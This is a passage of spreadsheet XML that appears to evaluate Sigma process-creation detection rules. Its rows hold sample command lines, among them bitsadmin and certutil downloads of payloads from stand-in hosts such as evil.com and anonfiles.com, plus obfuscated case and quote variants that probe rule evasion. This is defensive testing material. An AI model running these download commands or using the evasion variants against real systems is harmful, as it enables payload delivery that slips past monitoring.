          <t>fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd</t>
        </is>
      </c>
      <c r="E976" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WerFault.exe -prC:\Windows\System32\notepad.exe</t>
        </is>
      </c>
      <c r="F976" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G976" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H976" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I976" s="36" t="n"/>
      <c r="J976" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K976" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="977" ht="15.75" customHeight="1" s="42">
      <c r="A977" s="43" t="n"/>
      <c r="B977" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_no_cli_flags_execution</t>
        </is>
      </c>
      <c r="C977" s="36" t="inlineStr">
        <is>
          <t>Suspicious Windows Update Agent Empty Cmdline</t>
        </is>
      </c>
      <c r="D977" s="36" t="inlineStr">
        <is>
          <t>52d097e2-063e-4c9c-8fbb-855c8948d135</t>
        </is>
      </c>
      <c r="E977" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wuauclt.exe ""</t>
        </is>
      </c>
      <c r="F977" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G977" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H977" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I977" s="36" t="n"/>
      <c r="J977" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K977" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="978" ht="15.75" customHeight="1" s="42">
      <c r="A978" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B978" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download</t>
        </is>
      </c>
      <c r="C978" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin</t>
        </is>
      </c>
      <c r="D978" s="36" t="inlineStr">
        <is>
          <t>d059842b-6b9d-4ed1-b5c3-5b89143c6ede</t>
        </is>
      </c>
      <c r="E978" s="36" t="inlineStr">
        <is>
          <t>bitsadmin.exe	/transfer	myJob	http://evil.com/payload.exe	C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F978" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G978" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H978" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I978" s="36" t="n"/>
      <c r="J978" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K978" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="979" ht="15.75" customHeight="1" s="42">
      <c r="A979" s="43" t="n"/>
      <c r="B979" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C979" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D979" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E979" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F979" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G979" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H979" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I979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979" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K979" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="980" ht="15.75" customHeight="1" s="42">
      <c r="A980" s="43" t="n"/>
      <c r="B980" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C980" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D980" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E980" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /"transfer" downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F980" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G980" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H980" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I980" s="43" t="n"/>
      <c r="J980" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K980" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="981" ht="15.75" customHeight="1" s="42">
      <c r="A981" s="43" t="n"/>
      <c r="B981" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C981" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D981" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E981" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TRAnsFER downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F981" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G981" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H981" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I981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981" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K981" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="982" ht="15.75" customHeight="1" s="42">
      <c r="A982" s="43" t="n"/>
      <c r="B982" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C982" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D982" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E982" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F982" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G982" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H982" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I982" s="43" t="n"/>
      <c r="J982" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K982" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="983" ht="15.75" customHeight="1" s="42">
      <c r="A983" s="43" t="n"/>
      <c r="B983" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C983" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D983" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E983" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRAnsfER downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F983" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G983" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H983" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I983" s="4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983" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K983" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="984" ht="15.75" customHeight="1" s="42">
      <c r="A984" s="43" t="n"/>
      <c r="B984" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_direct_ip</t>
        </is>
      </c>
      <c r="C984" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From Direct IP Via Bitsadmin</t>
        </is>
      </c>
      <c r="D984" s="36" t="inlineStr">
        <is>
          <t>99c840f2-2012-46fd-9141-c761987550ef</t>
        </is>
      </c>
      <c r="E984" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRANSfEr downloadJob http://010.0.0.1/malicious.exe C:\Windows\Temp\malicious.exe</t>
        </is>
      </c>
      <c r="F984" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G984" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H984" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I984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984" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K984" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="985" ht="15.75" customHeight="1" s="42">
      <c r="A985" s="43" t="n"/>
      <c r="B985" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C985" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D985" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E985" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F985" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G985" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H985" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I985" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J985" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K985" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="986" ht="15.75" customHeight="1" s="42">
      <c r="A986" s="43" t="n"/>
      <c r="B986" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C986" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D986" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E986" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCache /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F986" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G986" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H986" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I986" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J986" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K986" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="987" ht="15.75" customHeight="1" s="42">
      <c r="A987" s="43" t="n"/>
      <c r="B987" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C987" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D987" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E987" s="36" t="inlineStr">
        <is>
          <t>certutil -URLCaCHE -split -F https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F987" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G987" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H987" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I987" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J987" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K987" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="988" ht="15.75" customHeight="1" s="42">
      <c r="A988" s="43" t="n"/>
      <c r="B988" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C988" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D988" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E988" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split /"f" https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F988" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G988" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H988" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I988" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J988" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K988" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="989" ht="15.75" customHeight="1" s="42">
      <c r="A989" s="43" t="n"/>
      <c r="B989" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C989" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D989" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E989" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCAChE -split -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F989" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G989" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H989" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I989" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J989" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K989" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="990" ht="15.75" customHeight="1" s="42">
      <c r="A990" s="43" t="n"/>
      <c r="B990" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C990" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D990" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E990" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -SplIt -"f" https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F990" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G990" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H990" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I990" s="36" t="n"/>
      <c r="J990" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K990" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="991" ht="15.75" customHeight="1" s="42">
      <c r="A991" s="43" t="n"/>
      <c r="B991" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C991" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D991" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E991" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlCAcHE -split -F https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F991" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G991" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H991" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I991" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J991" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K991" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="992" ht="15.75" customHeight="1" s="42">
      <c r="A992" s="43" t="n"/>
      <c r="B992" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C992" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D992" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E992" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F992" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G992" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H992" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I992" s="36" t="n"/>
      <c r="J992" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K992" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="993" ht="15.75" customHeight="1" s="42">
      <c r="A993" s="43" t="n"/>
      <c r="B993" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C993" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D993" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E993" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F993" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G993" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H993" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I993" s="36" t="n"/>
      <c r="J993" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K993" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="994" ht="15.75" customHeight="1" s="42">
      <c r="A994" s="43" t="n"/>
      <c r="B994" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C994" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D994" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E994" s="36" t="inlineStr">
        <is>
          <t>certutil -uRLCAChe -"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F994" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G994" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H994" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I994" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J994" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K994" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="995" ht="15.75" customHeight="1" s="42">
      <c r="A995" s="43" t="n"/>
      <c r="B995" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_file_sharing_domains</t>
        </is>
      </c>
      <c r="C995" s="36" t="inlineStr">
        <is>
          <t>Suspicious Download From File-Sharing Website Via Bitsadmin</t>
        </is>
      </c>
      <c r="D995" s="36" t="inlineStr">
        <is>
          <t>8518ed3d-f7c9-4601-a26c-f361a4256a0c</t>
        </is>
      </c>
      <c r="E995" s="36" t="inlineStr">
        <is>
          <t>certutil -UrlcACHe /"split" -f https://anonfiles.com/example/payload.exe C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F995" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G995" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H995" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I995" s="36" t="inlineStr">
        <is>
          <t>Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE (42a5f1e7-9603-4f6d-97ae-3f37d130d794); Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J995" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K995" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="996" ht="15.75" customHeight="1" s="42">
      <c r="A996" s="43" t="n"/>
      <c r="B996" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C996" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D996" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E996" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F996" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G996" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H996" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I996" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J996" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K996" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="997" ht="15.75" customHeight="1" s="42">
      <c r="A997" s="43" t="n"/>
      <c r="B997" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C997" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D997" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E997" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob -"download" -"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F997" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G997" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H997" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I997" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J997" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K997" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="998" ht="15.75" customHeight="1" s="42">
      <c r="A998" s="43" t="n"/>
      <c r="B998" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C998" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D998" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E998" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRansFeR myjob /download /PRioRITY normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F998" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G998" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H998" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I998" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J998" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K998" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="999" ht="15.75" customHeight="1" s="42">
      <c r="A999" s="43" t="n"/>
      <c r="B999" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C999" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D999" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E999" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /"download" /PriOrIty normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F999" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G999" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H999" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I999" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J999" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K999" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1000" ht="15.75" customHeight="1" s="42">
      <c r="A1000" s="43" t="n"/>
      <c r="B1000" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1000" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1000" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1000" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TraNSFEr myjob /dowNlOad /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1000" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1000" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1000" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1000" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1000" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1000" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1001" ht="15.75" customHeight="1" s="42">
      <c r="A1001" s="43" t="n"/>
      <c r="B1001" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1001" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1001" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1001" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myjob /"download" /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1001" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1001" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1001" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1001" s="43" t="n"/>
      <c r="J1001" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1001" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1002" ht="15.75" customHeight="1" s="42">
      <c r="A1002" s="43" t="n"/>
